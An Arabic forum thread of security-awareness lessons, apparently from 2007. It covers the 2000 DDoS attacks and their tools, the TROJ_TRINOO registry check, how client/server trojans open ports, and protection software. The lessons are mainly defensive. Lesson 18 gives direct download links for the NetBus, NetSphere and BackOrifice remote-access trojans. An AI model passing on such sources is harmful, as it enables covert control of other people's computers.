استغلالها لتدمير الموقع. وتشير تحريات مكتب التحقيقات الفيدرالي (FBI) الأمريكي، إلى أن الشكوك تحوم
حول شخصين، يدعيان Mafiaboy، وCoolio ظهرت اسماهما في عدد من مواقع إنترنت السفلية.
أكبر عملية حجب خدمة في تاريخ إنترنت!
.
.
تعتبر هجمات حجب الخدمة الموزعة DDoS (Distributed Denial of Service)، نوعاً جديداً من
هجمات حجب الخدمة العادية التي تعتمد على استخدام برامج معينة في الهجوم. وهذا النوع من الهجمات،
هو الذي استخدم في الهجوم على كبرى مواقع إنترنت، مثل ZDNet وYahoo!، وeBay، وAmazon،
وCNN، وغيرها. وتعتمد هذه الهجمات على تجنيد أجهزة كمبيوتر متصلة بإنترنت، بدون علم مالكيها،
وتوجيهها إلى بث الرزم الشبكية إلى مزود معين، بهدف إيقافه عن العمل، نتيجة ضغط البيانات المستقبلة.
ويعتمد هذا النوع من الهجمات على وضع برنامج خبيث خاص، من نوع "حصان طروادة" (Trojan
horse)، في كل كمبيوتر متصل بإنترنت يمكن الوصول إليه، عن طريق إرسال البرنامج بواسطة البريد
الإلكتروني، مثلاً، وتفعيله على هذه الأجهزة، لتعمل كأجهزة بث للرزم الشبكية، عند تلقيها الأمر بذلك من
برنامج محدد يقبع على جهاز أحد المخترقين. ومن أشهر البرامج المستخدمة في إجراء هذه الهجمات:
TRINOO، وTribe FloodNet، وTFN2K، وstacheldraht. ويعتبر هذا النوع من هجمات
حجب الخدمة، أكثر الأنواع خطورة، حيث يمكن أن يشكل خطراً على شبكة إنترنت كلها، وليس على بعض
المواقع فقط، حيث أن كل موقع من المواقع التي أصيبت في شهر فبراير/ شباط الفائت، بهذا النوع من
هجمات حجب الخدمة، هي مواقع تحجز جزءاً كبيراً من حزمة البيانات في إنترنت، ما قد يهدد الشبكة
بالكامل. وإن حدث ذلك يوماً، فنتوقع أن يشهد العالم أزمة اقتصادية شاملة!
.
.
ما الحل؟!
معلومات تقنية مهمة، للتصدي لهجمات حجب الخدمة
إذا كنت تعمل مديراً لشبكة ويب، أو كنت مسؤولاً عن أحد مواقع ويب، فمن المؤكد أن تكون عمليات التشويه
وحجب الخدمة الأخيرة، التي تمت خلال شهر فبراير/ شباط الفائت، والتي طالت أكبر مواقع إنترنت في
الدول العربية والعالم، سببت لك قلقاً كبيراً على وظيفتك، وربما بعضاً من الكوابيس ليلاً! وننصحك لذلك،
بالاطلاع على الدراسات التقنية في المواقع التالية، التي تشرح بتوسع طرق عمل عمليات حجب الخدمة، مع
عرض أفضل الوسائل التقنية للوقاية منها، وتحري مصادرها:
خلاصة ورشة عمل، أجرتها منظمة CERT، للتعامل مع هجمات حجب الخدمة http://www.cert.org/reports/dsit_workshop.pdf (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.cert.org/reports/dsit_workshop.pdf%5Cn%5CnThis%20file%20was%20not%2 0retrieved%20by%20Teleport%20Pro,%20because%20it%2 0is%20addressed%20on%20a%20domain%20or%20path%20ou tside%20the%20boundaries%20set%20for%20its%20Start ing%20Address.%5Cn%5CnDo%20you%20want%20to%20open% 20it%20from%20the%20server?%27%29%29window.locatio n=%27http://www.cert.org/reports/dsit_workshop.pdf%27)
دراسة لاستراتيجيات الوقاية من هجمات حجب الخدمة الموزعة، تقدمها شركة Cisco http://www.cisco.com/warp/public/707/22.html (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.cisco.com/warp/public/707/22.html%5Cn%5CnThis%20file%20was%20not%20retrieved %20by%20Teleport%20Pro,%20because%20it%20is%20addr essed%20on%20a%20domain%20or%20path%20outside%20th e%20boundaries%20set%20for%20its%20Starting%20Addr ess.%5Cn%5CnDo%20you%20want%20to%20open%20it%20fro m%20the%20server?%27%29%29window.location=%27http://www.cisco.com/warp/public/707/22.html%27)
شرح تقني مهم، لطرق التقليل من مخاطر هجمات Smurf، وfraggle http://users.quadrunner.com/chuegen/smurf.cgi (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://users.quadrunner.com/chuegen/smurf.cgi%5Cn%5CnThis%20file%20was%20not%20retriev ed%20by%20Teleport%20Pro,%20because%20it%20is%20ad dressed%20on%20a%20domain%20or%20path%20outside%20 the%20boundaries%20set%20for%20its%20Starting%20Ad dress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20f rom%20the%20server?%27%29%29window.location=%27htt p://users.quadrunner.com/chuegen/smurf.cgi%27)
ماذا تفعل عند إصابة نظامك ببرامج حصان طروادة، الخاص بهجمات DDoS؟ http://www.sans.org/y2k/DDoS.htm (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.sans.org/y2k/DDoS.htm%5Cn%5CnThis%20file%20was%20not%20retrieve d%20by%20Teleport%20Pro,%20because%20it%20is%20add ressed%20on%20a%20domain%20or%20path%20outside%20t he%20boundaries%20set%20for%20its%20Starting%20Add ress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20fr om%20the%20server?%27%29%29window.location=%27http ://www.sans.org/y2k/DDoS.htm%27)
أساليب الوقاية التي يجب أن يتبعها مقدمو خدمة إنترنت (ISPs) http://www.cs.washington.edu/homes/savage/traceback.html (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.cs.washington.edu/homes/savage/traceback.html%5Cn%5CnThis%20file%20was%20not%20re trieved%20by%20Teleport%20Pro,%20because%20it%20is %20addressed%20on%20a%20domain%20or%20path%20outsi de%20the%20boundaries%20set%20for%20its%20Starting %20Address.%5Cn%5CnDo%20you%20want%20to%20open%20i t%20from%20the%20server?%27%29%29window.location=% 27http://www.cs.washington.edu/homes/savage/traceback.html%27)
التعامل مع هجمات DDoS الناتجة عن برنامجي TRINOO، وTFN http://xforce.iss.net/alerts/advise40.php3 (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://xforce.iss.net/alerts/advise40.php3%5Cn%5CnThis%20file%20was%20not%20ret rieved%20by%20Teleport%20Pro,%20because%20it%20is% 20addressed%20on%20a%20domain%20or%20path%20outsid e%20the%20boundaries%20set%20for%20its%20Starting% 20Address.%5Cn%5CnDo%20you%20want%20to%20open%20it %20from%20the%20server?%27%29%29window.location=%2 7http://xforce.iss.net/alerts/advise40.php3%27)
.
.
إنذار.. برنامج جديد لشن هجمات حجب الخدمة الموزعة
استخدمت جميع هجمات حجب الخدمة التي تمت في شهر فبراير الفائت، برامج من نوع حصان طروادة، لا
تعمل إلا على أنظمة يونكس، ولينكس فقط، ما يعني أن مستخدمي أنظمة ويندوز كانوا في أمان نسبي، من أن
تُستخدم أجهزتهم، بدون علمهم، لشن هجمات على مواقع إنترنت معينة. لكن شركة TrendMicro، التي
تعمل في مجال الحماية من الفيروسات، كشفت أواخر الشهر ذاته، عن انتشار برنامج (
TROJ_TRINOO) الجديد من نوع حصان طروادة، تمت برمجته لشن هجمات حجب الخدمة هذه المرة،
من أنظمة ويندوز!
وهذا البرنامج هو زبون لبرنامج Trinoo، الذي يعمل كمركز القيادة، لشن هذه الهجمات.. فإذا تمكن أحد
المخترقين، وضع هذا البرنامج في نظامك، بدون علمك، عن طريق إرساله بالبريد الإلكتروني، مثلاً، فإنه
سيتمكن من استخدام جهازك لشن الهجمات على أي مزود متصل بإنترنت. ولا يحتاج في هذه الحالة، إلا إلى
معرفة عنوان IP لجهازك، خلال اتصالك بإنترنت! ويمكنك التأكد من خلو نظامك من هذا البرنامج، كما يلي:
افصل اتصال جهازك بإنترنت، ثم شغّل برنامج محرر سجل النظام (Regedit.exe)، واذهب إلى المفتاح (
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Ru
n)، وابحث عن الملف SERVICE.EXE (وليس الملف SERVICES.EXE، الموجود أصلاً في
أنظمة NT، و2000)، واحذفه من النظام، إن وجد، ثم أعد تشغيل الجهاز. ويمكنك التأكد من أن الملف الذي
تحذفه هو هذا البرنامج الخبيث، بالتأكد من حجمه، الذي يعادل 23145 بايت. وجدير بالذكر أن معظم برامج
الحماية من الفيروسات ستطرح تحديثات تحمي من هذا البرنامج، في أحدث إصداراتها.

Linux Root
, Tue, 26 Jun 2007 22:56:47 +0200
الدرس الخامس عشر
الإخـتـراق

الاختراق بشكل عام هو القدرة على الوصول لهدف معين بطريقة غير مشروعة عن طريق ثغرات في نظام الحماية الخاص بالهدف... وحينما نتكلم عن الاختراق بشكل عام فنقصد بذلك قدرة المخترق على الدخول الى جهاز شخص ما بغض النظر عن الأضرار التي قد يحدثها، فحينما يستطيع الدخول الى جهاز آخر فهو مخترق (Hacker) أما عندما يقوم بحذف ملف أو تشغيل آخر أو جلب ثالث فهو مخرب (Cracker).

كيف يتم الاختراق؟

اختراق الأجهزة هو كأي اختراق آخر لشيءٍ ما.. له طرق وأسس يستطيع من خلالها المخترق التطفل على أجهزة الآخرين عن طريق معرفة الثغرات الموجودة في ذلك النظام.. وغالباً ما تكون تلك الثغرات في المنافذ (Ports) الخاصة بالجهاز... وهذه المنافذ يمكن وصفها بأبسط شكل على أنها بوابات للجهاز على الانترنت.. على سبيل المثال: المنفذ 80 غالباً ما يكون مخصصاً لموفر الخدمة كي يتم دخول المستخدم الانترنت وفي بعض الأوقات يكون المنفذ رقمه 8080 ... هناك طرق عديدة للاختراق أبسطها والتي يمكن للمبتدئين استخدامها هي البرامج التي تعتمد نظام (الزبون/الخادم) (client/server) حيث تحتوي على ملفين أحدهما Server يرسل إلى الجهاز المصاب بطريقة ما، والآخر Client يتم تشغيله من قبل المخترق للتحكم في الجهاز المصاب وعند تشغيل ملف الـ Server من قبل المُختَرَق يصبح الكمبيوتر عرضة للاختراق حيث يتم فتح أحد المنافذ (Ports) وغالباً ما يكون البورت 12345 أو12346 وبذلك يستطيع الاختراق ببرنامج مخصص لذلك كبرنامج NetBus أو NetSphere أو BackOrifice ويفعل ما يحلو له. كما يستطيع أشخاص آخرون (اضافة الى من وضع الملف في جهازك) فعل نفس الشيء بك حينما يقومون بعمل مسح للبورتات (Port Scanning) فيجدون البورت لديك مفتوح.. هذه الطريقة التي ذكرتها هي أبسط أشكال الاختراق، فهناك طرق عديدة تمكن المتطفلين من اختراقك مباشرة بدون إرسال ملفات! لدرجة أن جمعية للمقرصنين في أميركا ابتكرت طريقة للاختراق متطورة للغاية حيث يتم اختراقك عن طريق حزم البيانات التي تتدفق مع الاتصالات الهاتفية عبر انترنت فيتم اعتراض تلك البيانات والتحكم في جهازك

كيف تواجه الاختراق؟

يجب أن تعرف في المقام الأول أنك مادمت متصلاً على الشبكة (Online) فأنت معرض للاختراق في أي وقت وبأي طريقة كانت وقد يستهدفك أحد المخترقين (الهاكرز) لسبب ما أو عشوائياً حتى، وربما يكون هذا الهاكر خبيراًَ (Expert) فيمكنه اختراقك بحيث لا تحس بما يفعله تجاهك!! وعلى هذا فأفضل طريقة هي عدم وضع أشيائك الهامة والخاصة داخل جهازك كرقم بطاقة الإئتمان أو أرقامك السرية، وهناك طريقة أفضل وهي استخدام جهاز خاص للاتصال بالانترنت فقط لا يحتوي على معلومات هامة، وان كانت هذه الطريقة مكلفة بعض الشيء ولكن للضرورة أحكام. هناك برامج مضادة للاختراق ولكن عموماً فهي ليست مضمونة تماماً ولكن لا مانع من استخدامها حيث ستفيدك في التخلص من بعض الهاكرز ولكن ليس الخبراء منهم.. بالنسبة للبرامج التي ذكرتها في البداية والتي تخترق عن طريق إرسال ملف تجسس كملفات (Patch) فلا داعي للخوف منها طالما كنت تمتلك برنامج مضاد جيد للفيروسات كبرنامجي (McAfee Virus Scan Last Update (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://download.mcafee.com/eval/evaluate.asp%5Cn%5CnThis%20file%20was%20not%20retr ieved%20by%20Teleport%20Pro,%20because%20it%20is%2 0addressed%20on%20a%20domain%20or%20path%20outside %20the%20boundaries%20set%20for%20its%20Starting%2 0Address.%5Cn%5CnDo%20you%20want%20to%20open%20it% 20from%20the%20server?%27%29%29window.location=%27 http://download.mcafee.com/eval/evaluate.asp#anti-virus%27)) أو(Norton AntiVirus 5.0 Last Update (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.symantic.com/nav/index.html%5Cn%5CnThis%20file%20was%20not%20retrie ved%20by%20Teleport%20Pro,%20because%20it%20is%20a ddressed%20on%20a%20domain%20or%20path%20outside%2 0the%20boundaries%20set%20for%20its%20Starting%20A ddress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20 from%20the%20server?%27%29%29window.location=%27ht tp://www.symantic.com/nav/index.html%27) ) هذين البرنامجين يؤمنان حماية من ملفات التجسس ويعتبرانها فيروسات لذلك إذا وجد مثل هذه الملفات يقومان بتحذيرك على الفور.. هناك برامج أخرى مخصصة للحماية من الهاكرز فقط كبرنامج LookDown2000 (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://freehosting2.at.webjump.com/li/liwa-webjump/program/Lockdown2000.exe%5Cn%5CnThis%20file%20was%20not%20 retrieved%20by%20Teleport%20Pro,%20because%20it%20 is%20addressed%20on%20a%20domain%20or%20path%20out side%20the%20boundaries%20set%20for%20its%20Starti ng%20Address.%5Cn%5CnDo%20you%20want%20to%20open%2 0it%20from%20the%20server?%27%29%29window.location =%27http://freehosting2.at.webjump.com/li/liwa-webjump/program/Lockdown2000.exe%27) أو NetBuster (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.netbus.com/files/netbuster.zip%5Cn%5CnThis%20file%20was%20not%20ret rieved%20by%20Teleport%20Pro,%20because%20it%20is% 20addressed%20on%20a%20domain%20or%20path%20outsid e%20the%20boundaries%20set%20for%20its%20Starting% 20Address.%5Cn%5CnDo%20you%20want%20to%20open%20it %20from%20the%20server?%27%29%29window.location=%2 7http://www.netbus.com/files/netbuster.zip%27) أو IntruderAlert'99 (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.bonzi.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.bonzi.com/%27).

نقاط متفرقة

- الانترنت وضعت للإفادة وتبادل المعلومات والثقافات، لذلك فمن غير اللائق استخدامها للتطفل على الآخرين وسرقة معلوماتهم.


- احذر من التباهي بقدرتك على حماية جهازك حماية تامة وبأن جهازك غير قابل للاختراق لأن هناك دائماً من هم أعلم منك وسيعتبرون ذلك تحدياً لهم.


- حاول دائماً تغيير كلمة السر بصورة دورية فهي قابلة للاختراق.


- أي ربط شبكي يترتب عليه مخاطر من الاختراق.. حتى الشبكات المحلية (Intranet).

- أفضل الطرق للحماية هي جعل عملية الاختراق صعبة ومكلفة للمتطفلين.

Linux Root
, Tue, 26 Jun 2007 22:57:22 +0200
الدرس السادس عشر
عرض لبرنامج optout لفحص الجهاز من برامج الهاكرز


بفحص جهازك وحذف ملفات التجسس التي مرفقة ببعض البرامج و هو من البرامج الرائعة في هذا المجال

من الميزات الجميلة لهذا البرنامج صغر حجمه حيث أن حجمه يصل إلى عشرات كيلو بايتات .. و قد وضعنا البرنامج في سيرفرنا لأهميته .. بإمكانك تزيله من هنا (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://img.fares.net/internet/folder1/optout.exe%5Cn%5CnThis%20file%20was%20not%20retrie ved%20by%20Teleport%20Pro,%20because%20it%20is%20a ddressed%20on%20a%20domain%20or%20path%20outside%2 0the%20boundaries%20set%20for%20its%20Starting%20A ddress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20 from%20the%20server?%27%29%29window.location=%27ht tp://img.fares.net/internet/folder1/optout.exe%27)

هذا هو موقع البرنامج الرسمي . و ستجد في الموقع العديد من البرامج التي تساعدك على حماية جهازك

http://grc.com/default.htm (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://grc.com/default.htm%5Cn%5CnThis%20file%20was%20not%20retri eved%20by%20Teleport%20Pro,%20because%20it%20is%20 addressed%20on%20a%20domain%20or%20path%20outside% 20the%20boundaries%20set%20for%20its%20Starting%20 Address.%5Cn%5CnDo%20you%20want%20to%20open%20it%2 0from%20the%20server?%27%29%29window.location=%27h ttp://grc.com/default.htm%27)

بعد تنزيل البرنامج في جهازك تستطيع تشغيله دون الحاجة لعملية التنصيب .. فقط إضغط على الملف و تجد شاشة مثل هذه الشاشة





http://www.7shasha.com/vb/imagehosting/29038464e6cda40523.gif

يقوم البرنامج بمجرد تشغيله بالبحث السريع عن الملفات و هذا البحث لا يجدي . لهذا عليك بالبحث البطيء و لإجراء هذه العملية اضغط على Deep Scan و بعد ذلك سيقوم البرنامج بالبحث عن ملفات الإختراق في جهازك و تظهر هذه الشاشة


http://www.7shasha.com/vb/imagehosting/29038464e6cda53da3.gif
تجد في هذه الصورة التالي

1 يعرض لك هنا المكان الذي يبحث فيه البرنامج و يكون البحث بسرعة حيث ان هذا القسم يتغير بسرعة

2 هنا تجد قسمين القسم الأول يعرض عدد المجلدات التي بحث فيها البرنامج و القسم الثاني يعرض عدد الملفات التي بحث فيها

3 يعرض لك عدد الملفات التي وجدها و التي هي ملفات تجسس يجب حذفها و إذا كان العدد يفوق الواحد يتغير اللون للأحمر و هو يوحي بالخطر إما إذا كان العدد صفر فيبقى اللون أخضر و هو يوحي بالأمان

4 يعرض أسماء الملفات التي يبحث عنها

5 إذا أردت توقيف عملية البحث عليك بهذا الزر

6 هذا الزر هو للخروج من البرنامج

بعد عملية البحث يظهر لك تقرير يعطيك عدد الملفات التي وجدها في حال وجد عدد يفوق الواحد يطلب منك مسحها و ذلك بالضغط على زر يكون مكانة بنفس مكان الزر (رقم 5) و بعد ذلك عليك أن تقوم بالفحص مرة أخرى للتأكد من أن البرنامج قد قام بمسح الملفات التي وجدها

Linux Root
, Tue, 26 Jun 2007 22:58:52 +0200
الدرس السابع عشر
آخر الإحصائيات الخاصة بالهاكرز
حذرت منظمة أمريكية تتولى حراسة الأمن الحاسوبي بتمويل من الحكومة من أن المتسللين والمخربين استولوا على مئات من أجهزة الكمبيوتر الموصولة بالإنترنت.
وقال خبراء "مركز سيرت" للتنسيق "إن المتطفلين غدوا الآن في وضع يؤهلهم لشن هجوم خطير يشكل خطراً على مواقع الإنترنت والبنية التحتية للشبكة". ويستغل المخربون نقطتي ضعف شائعتين, اكتشفتا في أنظمة "يونيكس" الحاسوبية في شهر يوليو الماضي.
ومنذ ذلك الحين سجلت نحو مائة حالة، استغل فيها المتطفلون هذين الخللين لتركيب أدوات "تعطيل خدمة المواقع" والتي ظهرت مخاطرها جلية في الهجمات التي نفذت ضد مواقع شهيرة مثل "ياهو كوم" و"أمازون كوم" و"سي إن إن. كوم".

وتتوالى التقارير عن مثل هذه الهجمات بمعدل 2 إلى 5 حالات في اليوم. وقال كيفين هول رئيس فريق تعقب الحادث في "مركز سيرت": إن مخرباً واحداً يستطيع السيطرة على جيش من الحاسبات عن بعد مستفيداً من عيوب شبكات "ترايبال فلود". وبتجنيد تلك الأجهزة للاتصال في اللحظة نفسها بموقع واحد تتكثف حركة المرور المقبلة إلى الموقع مما يؤدي إلى إغلاقه أمام الزوار المشروعين.
ويعتقد هول أن هناك عدة عصابات للمخربين تعمل بشكل منفصل للسيطرة على أكبر عدد ممكن من الحاسبات التي تجندها متى شاءت لمهاجمة مواقع الشبكة.

Linux Root
, Tue, 26 Jun 2007 22:59:45 +0200
الدرس الثامن عشر
http://www.7shasha.com/vb/imagehosting/29038464e6eac20b90.jpg
ما هو الاختراق؟
الاختراق بشكل عام هو القدرة على الوصول لهدف معين بطريقة غير مشروعة عن طريق ثغرات في نظام الحماية الخاص بالهدف... وحينما نتكلم عن الاختراق بشكل عام فنقصد بذلك قدرة المخترق على الدخول الى جهاز شخص ما بغض النظر عن الأضرار التي قد يحدثها، فحينما يستطيع الدخول الى جهاز آخر فهو مخترق (Hacker) أما عندما يقوم بحذف ملف أو تشغيل آخر أو جلب ثالث فهو مخرب (Cracker).
كيف يتم الاختراق؟
اختراق الأجهزة هو كأي اختراق آخر لشيءٍ ما.. له طرق وأسس يستطيع من خلالها المخترق التطفل على أجهزة الآخرين عن طريق معرفة الثغرات الموجودة في ذلك النظام.. وغالباً ما تكون تلك الثغرات في المنافذ (Ports) الخاصة بالجهاز... وهذه المنافذ يمكن وصفها بأبسط شكل على أنها بوابات للجهاز على الانترنت.. على سبيل المثال: المنفذ 80 غالباً ما يكون مخصصاً لموفر الخدمة كي يتم دخول المستخدم الانترنت وفي بعض الأوقات يكون المنفذ رقمه 8080 ... هناك طرق عديدة للاختراق أبسطها والتي يمكن للمبتدئين استخدامها هي البرامج التي تعتمد نظام (الزبون/الخادم) (client/server) حيث تحتوي على ملفين أحدهما Server يرسل إلى الجهاز المصاب بطريقة ما، والآخر Client يتم تشغيله من قبل المخترق للتحكم في الجهاز المصاب وعند تشغيل ملف الـ Server من قبل المُختَرَق يصبح الكمبيوتر عرضة للاختراق حيث يتم فتح أحد المنافذ (Ports) وغالباً ما يكون البورت 12345 أو12346 وبذلك يستطيع الاختراق ببرنامج مخصص لذلك كبرنامج NetBus (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.ultraaccess.net/download/nbpro210.exe%5Cn%5CnThis%20file%20was%20not%20retr ieved%20by%20Teleport%20Pro,%20because%20it%20is%2 0addressed%20on%20a%20domain%20or%20path%20outside %20the%20boundaries%20set%20for%20its%20Starting%2 0Address.%5Cn%5CnDo%20you%20want%20to%20open%20it% 20from%20the%20server?%27%29%29window.location=%27 http://www.ultraaccess.net/download/nbpro210.exe%27) أو NetSphere (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://members.xoom.com/freeahat/netsphere.zip%5Cn%5CnThis%20file%20was%20not%20ret rieved%20by%20Teleport%20Pro,%20because%20it%20is% 20addressed%20on%20a%20domain%20or%20path%20outsid e%20the%20boundaries%20set%20for%20its%20Starting% 20Address.%5Cn%5CnDo%20you%20want%20to%20open%20it %20from%20the%20server?%27%29%29window.location=%2 7http://members.xoom.com/freeahat/netsphere.zip%27) أو BackOrifice (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://members.xoom.com/freeahat/bo.zip%5Cn%5CnThis%20file%20was%20not%20retrieved% 20by%20Teleport%20Pro,%20because%20it%20is%20addre ssed%20on%20a%20domain%20or%20path%20outside%20the %20boundaries%20set%20for%20its%20Starting%20Addre ss.%5Cn%5CnDo%20you%20want%20to%20open%20it%20from %20the%20server?%27%29%29window.location=%27http://members.xoom.com/freeahat/bo.zip%27) ويفعل ما يحلو له. كما يستطيع أشخاص آخرون (اضافة الى من وضع الملف في جهازك) فعل نفس الشيء بك حينما يقومون بعمل مسح للبورتات (Port Scanning) فيجدون البورت لديك مفتوح.. هذه الطريقة التي ذكرتها هي أبسط أشكال الاختراق، فهناك طرق عديدة تمكن المتطفلين من اختراقك مباشرة بدون إرسال ملفات! لدرجة أن جمعية للمقرصنين في أميركا ابتكرت طريقة للاختراق متطورة للغاية حيث يتم اختراقك عن طريق حزم البيانات التي تتدفق مع الاتصالات الهاتفية عبر انترنت فيتم اعتراض تلك البيانات والتحكم في جهازك وأنت (يا غافلين لكم الله)!!
كيف تواجه الاختراق؟
يجب أن تعرف في المقام الأول أنك مادمت متصلاً على الشبكة (Online) فأنت معرض للاختراق في أي وقت وبأي طريقة كانت وقد يستهدفك أحد المخترقين (الهاكرز) لسبب ما أو عشوائياً حتى، وربما يكون هذا الهاكر خبيراًَ (Expert) فيمكنه اختراقك بحيث لا تحس بما يفعله تجاهك!! وعلى هذا فأفضل طريقة هي عدم وضع أشيائك الهامة والخاصة داخل جهازك كرقم بطاقة الإئتمان أو أرقامك السرية، وهناك طريقة أفضل وهي استخدام جهاز خاص للاتصال بالانترنت فقط لا يحتوي على معلومات هامة، وان كانت هذه الطريقة مكلفة بعض الشيء ولكن للضرورة أحكام. هناك برامج مضادة للاختراق ولكن عموماً فهي ليست مضمونة تماماً ولكن لا مانع من استخدامها حيث ستفيدك في التخلص من بعض الهاكرز ولكن ليس الخبراء منهم.. بالنسبة للبرامج التي ذكرتها في البداية والتي تخترق عن طريق إرسال ملف تجسس كملفات (Patch) فلا داعي للخوف منها طالما كنت تمتلك برنامج مضاد جيد للفيروسات كبرنامجي (McAfee Virus Scan Last Update (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://download.mcafee.com/eval/evaluate.asp%5Cn%5CnThis%20file%20was%20not%20retr ieved%20by%20Teleport%20Pro,%20because%20it%20is%2 0addressed%20on%20a%20domain%20or%20path%20outside %20the%20boundaries%20set%20for%20its%20Starting%2 0Address.%5Cn%5CnDo%20you%20want%20to%20open%20it% 20from%20the%20server?%27%29%29window.location=%27 http://download.mcafee.com/eval/evaluate.asp#anti-virus%27)) أو(Norton AntiVirus 5.0 Last Update (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.symantic.com/nav/index.html%5Cn%5CnThis%20file%20was%20not%20retrie ved%20by%20Teleport%20Pro,%20because%20it%20is%20a ddressed%20on%20a%20domain%20or%20path%20outside%2 0the%20boundaries%20set%20for%20its%20Starting%20A ddress.%5Cn%5CnDo%20you%20want%20to%20open%20it%20 from%20the%20server?%27%29%29window.location=%27ht tp://www.symantic.com/nav/index.html%27)) هذين البرنامجين يؤمنان حماية من ملفات التجسس ويعتبرانها فيروسات لذلك إذا وجد مثل هذه الملفات يقومان بتحذيرك على الفور.. هناك برامج أخرى مخصصة للحماية من الهاكرز فقط كبرنامج LookDown2000 (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://freehosting2.at.webjump.com/li/liwa-webjump/program/Lockdown2000.exe%5Cn%5CnThis%20file%20was%20not%20 retrieved%20by%20Teleport%20Pro,%20because%20it%20 is%20addressed%20on%20a%20domain%20or%20path%20out side%20the%20boundaries%20set%20for%20its%20Starti ng%20Address.%5Cn%5CnDo%20you%20want%20to%20open%2 0it%20from%20the%20server?%27%29%29window.location =%27http://freehosting2.at.webjump.com/li/liwa-webjump/program/Lockdown2000.exe%27) أو NetBuster (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.netbus.com/files/netbuster.zip%5Cn%5CnThis%20file%20was%20not%20ret rieved%20by%20Teleport%20Pro,%20because%20it%20is% 20addressed%20on%20a%20domain%20or%20path%20outsid e%20the%20boundaries%20set%20for%20its%20Starting% 20Address.%5Cn%5CnDo%20you%20want%20to%20open%20it %20from%20the%20server?%27%29%29window.location=%2 7http://www.netbus.com/files/netbuster.zip%27) أو IntruderAlert'99 (http://javascript%3cb%3e%3c/b%3E:if%28confirm%28%27http://www.bonzi.com/%5Cn%5CnThis%20file%20was%20not%20retrieved%20by%2 0Teleport%20Pro,%20because%20it%20is%20addressed%2 0on%20a%20domain%20or%20path%20outside%20the%20bou ndaries%20set%20for%20its%20Starting%20Address.%5C n%5CnDo%20you%20want%20to%20open%20it%20from%20the %20server?%27%29%29window.location=%27http://www.bonzi.com/%27).
نقاط متفرقة
- الانترنت وضعت للإفادة وتبادل المعلومات والثقافات، لذلك فمن غير اللائق استخدامها للتطفل على الآخرين وسرقة معلوماتهم.
- احذر من التباهي بقدرتك على حماية جهازك حماية تامة وبأن جهازك غير قابل للاختراق لأن هناك دائماً من هم أعلم منك وسيعتبرون ذلك تحدياً لهم.
- حاول دائماً تغيير كلمة السر بصورة دورية فهي قابلة للاختراق.
- أي ربط شبكي يترتب عليه مخاطر من الاختراق.. حتى الشبكات المحلية (Intranet).
- أفضل الطرق للحماية هي جعل عملية الاختراق صعبة ومكلفة للمتطفلين

Linux Root
, Tue, 26 Jun 2007 23:00:24 +0200
الدرس التاسع عشر
الاختراق
من هم المخترقون ؟ وكيف يخترقون جهازك ؟
الأختراق هو قدرة طرف على الدخول إلى جهاز طرف آخر بغض النظر عن ما قد يلحقه به . و يتم ذلك بطريقة غير مشروعة او بدون اذن الطرف المخترق .
الهاكر و الكراكر - الدكتور جيكل و مستر هايد؟


هناك فرق شاسع بينهما .احدهما طيب و الآخر شرير..
+الهاكر Hacker: هو شخص يخترق بدافع جيد فكثير من الشركات تكلف شخص بفك شفرة نظام معين او الدخول.. هو شخص خبير يتعلم الكثير من لغات البرمجة و اوامر اليونيكس للإختراق ..
+الكراكرCracker: فهو على النقيض تماما شخص يخترق جهازك لمجرد العبث به فهمه التخريب بالدرجة الاولى.
كيف يتم الإختراق؟


هناك ما يمكن وصفه ببوابات لجهازك او ما يسمى بالمنافذ Ports فهناك عدد من المنافذ في جهازك و كل منها له غرض مثلا المنفذ 8080 احيانا يكون مخصص لمزود خدمتك .
كل ما يقوم به الكراكر هو ان يفتح احد هذه المنافذ حتى يستطيع الوصول لجهازك و هو ما يسمى بطريقة الزبون \الخادم (Client\Server) حيث يتم ارسال ملف لجهازك يفتح هذه المنافذ فيصبح جهازك server و الجهاز الآخر Client .
و من ثم يقوم بالوصول لهذه المنافذ عن طريق برامج كثير منها NetBus أو NetSphere و غيرها . و لا تعقد انه الشخص الوحيد الذي يستطيع الدخول لجهازك فجهازك اصبح مركرا تجاريا عاما يمكن لأي شخص الدخول عليه بمجرد عمل مسح للمنافذ Port scanning عن طريق احد البرامج .
كيف تحمي نفسك ؟


